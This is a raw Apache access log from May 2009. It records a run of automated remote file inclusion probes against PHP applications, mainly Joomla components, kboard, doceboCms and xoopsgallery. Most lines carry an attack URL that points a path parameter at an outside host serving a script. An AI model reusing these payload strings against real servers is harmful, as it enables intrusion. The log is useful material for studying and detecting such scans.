110.45.144.106 - - [16/May/2009:00:00:10 -0400] "GET /logs/access_log.Q108112900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=n%20otice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:00:00:13 -0400] "GET /logs/error_log.Q109042000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:00:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:00:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:00:19 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:00:19 -0400] "GET /logs/error_log.Q109042000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:00:19 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
110.45.144.106 - - [16/May/2009:00:00:45 -0400] "GET /logs/access_log.Q108112900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=n%20otice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:00:49 -0400] "GET /logs/error_log.Q109042000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.144.106 - - [16/May/2009:00:00:49 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
110.45.144.106 - - [16/May/2009:00:00:49 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
209.59.12.99 - - [16/May/2009:00:00:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [16/May/2009:00:01:08 -0400] "GET /logs/error_log.Q109042000%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
66.232.102.70 - - [16/May/2009:00:01:25 -0400] "GET /logs/access_log.Q108112200//citywriter/head.php?path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:01:25 -0400] "GET //citywriter/head.php?path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:01:25 -0400] "GET /logs//citywriter/head.php?path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:01:25 -0400] "GET /logs/access_log.Q108120600//citywriter/head.php?path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
220.181.7.97 - - [16/May/2009:00:02:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [16/May/2009:00:03:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.150.79.146 - - [16/May/2009:00:03:09 -0400] "GET /logs/access_log.Q108071200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:03:09 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:03:09 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:03:09 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.125.64.15 - - [16/May/2009:00:03:17 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.249.36.194 - - [16/May/2009:00:04:07 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:00:04:07 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:00:04:07 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:00:04:18 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:00:04:56 -0400] "GET /logs/error_log.Q109042000%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:00:04:58 -0400] "GET /logs/error_log.Q109042000%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
218.150.79.146 - - [16/May/2009:00:05:00 -0400] "GET /logs/access_log.Q108071200%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.157.225.65 - - [16/May/2009:00:05:08 -0400] "GET //?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
221.157.225.65 - - [16/May/2009:00:05:08 -0400] "GET /logs/access_log.Q108090100//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
221.157.225.65 - - [16/May/2009:00:05:08 -0400] "GET /logs//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:20 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:05:25 -0400] "GET /logs/access_log.Q109050800/?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.116.178.20 - - [16/May/2009:00:05:27 -0400] "GET /logs/access_log.Q108112400//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:00:05:27 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:00:05:28 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108112400//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
89.223.3.98 - - [16/May/2009:00:05:28 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
122.116.178.20 - - [16/May/2009:00:05:28 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:00:05:29 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
88.84.128.40 - - [16/May/2009:00:05:30 -0400] "GET /logs/access_log.Q108100600//configuration.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:05:30 -0400] "GET //configuration.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:05:30 -0400] "GET /logs//configuration.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
88.191.103.144 - - [16/May/2009:00:05:33 -0400] "GET /logs/access_log.Q108111500/inc/cmses/aedatingCMS.php?dir[inc]=http://purplehill.net/classes/access/1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:36 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:00:05:37 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:05:37 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:00:05:46 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:05:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [16/May/2009:00:06:12 -0400] "GET /logs/access_log.Q108090500//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
122.116.178.20 - - [16/May/2009:00:06:13 -0400] "GET /logs/access_log.Q108090500//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ladyboss.com.ua/readme.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
218.150.79.146 - - [16/May/2009:00:07:04 -0400] "GET /logs/access_log.Q108051700//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:07:04 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.220.4.131 - - [16/May/2009:00:07:51 -0400] "GET /logs/errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:00:07:51 -0400] "GET /errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:00:07:51 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:00:08:04 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:00:08:21 -0400] "GET //zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:08:21 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:08:21 -0400] "GET /logs/access_log.Q108092300//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:08:36 -0400] "GET /logs/access_log.Q109050700//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:08:38 -0400] "GET /logs/access_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:08:38 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:08:38 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.223.3.98 - - [16/May/2009:00:08:40 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:08:45 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:09:07 -0400] "GET /logs/access_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:09:07 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:00:09:07 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:00:10:36 -0400] "GET /logs/access_log.Q108092300%20%20//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:10:42 -0400] "GET /logs/access_log.Q109050700%20%20//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:10:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [16/May/2009:00:11:14 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:11:14 -0400] "GET //zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:11:14 -0400] "GET /logs/access_log.Q108092300//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:11:27 -0400] "GET /logs/access_log.Q109050700//zero_vote/ask_password.php?dir=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:11:30 -0400] "GET /logs/error_log.Q109050300%20%20/?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:12:07 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:12:11 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.223.3.98 - - [16/May/2009:00:12:12 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:12:14 -0400] "GET /logs/access_log.Q109050300%20%20/?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:12:15 -0400] "GET /logs/access_log.Q108101700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:12:15 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:12:15 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.223.3.98 - - [16/May/2009:00:12:15 -0400] "GET /logs/access_log.Q108091400%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:00 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:00 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:13:02 -0400] "GET /logs/error_log.Q109041900%20%20/?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:02 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:02 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:03 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:04 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:06 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:06 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:07 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:07 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:00:13:07 -0400] "GET /logs/access_log.Q108120600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:13:24 -0400] "GET /logs/access_log.Q108112200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:13:24 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:00:13:24 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:00:13:25 -0400] "GET /logs/access_log.Q108112200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
